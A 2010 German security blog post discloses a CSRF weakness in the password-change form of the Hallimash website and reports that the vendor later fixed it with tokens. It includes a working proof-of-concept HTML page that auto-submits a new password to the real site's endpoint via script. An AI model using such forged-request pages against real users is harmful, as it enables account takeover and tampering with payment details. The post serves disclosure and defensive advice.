Hallimash ist genauso schlimm wie Trigami

08.08.2010 yahe legacy security thoughts update

Nachdem ich mir letzes Mal Trigami angesehen habe, soll es heute um deren Konkurrenten "Hallimash" gehen. Denn auch deren Webseite enthält "CSRF"-Lücken (Cross-Site Request Forgery):

<form action="/index.php?b=passwort&nav=2" method="POST">
  <input type="password" name="pw1" value="" maxlength="20" style="width:200px;" class="text">
  <input type="password" name="pw2" value="" maxlength="20" style="width:200px;" class="text">
  <input type="image" src="images/btn/speichern.jpg">
  <input type="hidden" name="sent" value="on">
</form>

Natürlich funktioniert der hier gezeigte Angriff in abgewandelter Form auch wieder wunderbar, um die Kontoverbindungsdaten eines Opfers zu ändern, bei denen man, wenn man ehrlich ist, frühestens bei einem Abrechnungsproblem mal hineinsehen wird.

<form method="POST" id="hallimashpwd" name="hallimashpwd" action="http://www.hallimash.com/index.php?b=passwort&nav=2">
  <input type="password" name="pw1" value="neuesPasswort" maxlength="20" style="width:200px;" class="text">
  <input type="password" name="pw2" value="neuesPasswort" maxlength="20" style="width:200px;" class="text">
  <input type="submit" name="submitButton">
  <input type="hidden" name="sent" value="on">
</form>
<script type="text/javascript">
  document.hallimashpwd.submitButton.click();
</script>

Auch hier gilt wieder einmal der Tipp, nur eingeloggt zu bleiben, wenn man gerade etwas auf der Seite machen will. Danach sollte man sich sofort wieder ausloggen, um solche Angriffe zu umgehen.

Update

Wie mir von Hallimash mitgeteilt wurde, haben sie das Problem nun beseitigt. Ein Blick auf die Webseite zeigt, dass sie nun eindeutige Tokens generieren, um die gezeigte Art Angriffe zu unterbinden.